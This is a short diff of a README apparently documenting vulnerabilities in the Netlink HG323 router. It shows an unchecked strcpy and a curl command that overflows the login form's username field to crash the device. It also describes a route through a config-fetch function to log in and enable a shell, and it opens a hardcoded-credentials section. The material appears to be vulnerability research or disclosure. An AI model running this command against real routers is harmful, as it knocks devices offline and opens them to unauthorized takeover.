anoop142/Netlink_HG323/README.md

     strcpy(username, input_username)

-curl http://192.168.1.1/boaform/admin/formLogin_en  --data-raw 'username=AAAAAAAAAA * 4000'&psd=blah'
+curl http://192.168.1.1/boaform/admin/formLogin_en  --data-raw 'username=AAAAAAAAAA * 4000'&psd=blah&verification_code=CAPTCHA&csrftoken=CSRF_TOKEN'

 This would crash the router.
-Easiest way to leverage this buffer overflow to use 'saveconfig" funtion, which will get the "last_good.xml', then login and enable shell or whatever.
+Easiest way to leverage this buffer overflow to use 'formMgmConfig' funtion, which will get the "last_good.xml', then login and enable shell or whatever.

 ## Hardcoded credentials